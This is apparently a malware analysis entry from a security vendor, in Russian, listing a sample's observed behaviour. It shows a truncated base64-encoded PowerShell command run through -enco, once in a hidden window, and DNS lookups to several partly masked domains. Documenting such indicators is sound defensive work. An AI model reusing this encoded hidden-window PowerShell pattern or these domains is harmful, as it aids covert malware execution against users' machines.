Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADIAMwBjAGMANQAzAGMANQAzAGIAPQAnAHgAMQA3ADgANABiADIAMAB4ADUAOAAnADsAJAB4ADkAMwAzADAAMgAxADcAMAA...
- DNS ASK sa###rithuc.com
- DNS ASK be####eshell.com
- DNS ASK or###eph.com
- DNS ASK 3u##.com
- DNS ASK fo####ynehoney.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -enco PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABiADIAMwBjAGMANQAzAGMANQAzAGIAPQAnAHgAMQA3ADgANABiADIAMAB4ADUAOAAnADsAJAB4ADkAMwAzADAAMgAxADcAMAA...' (со скрытым окном)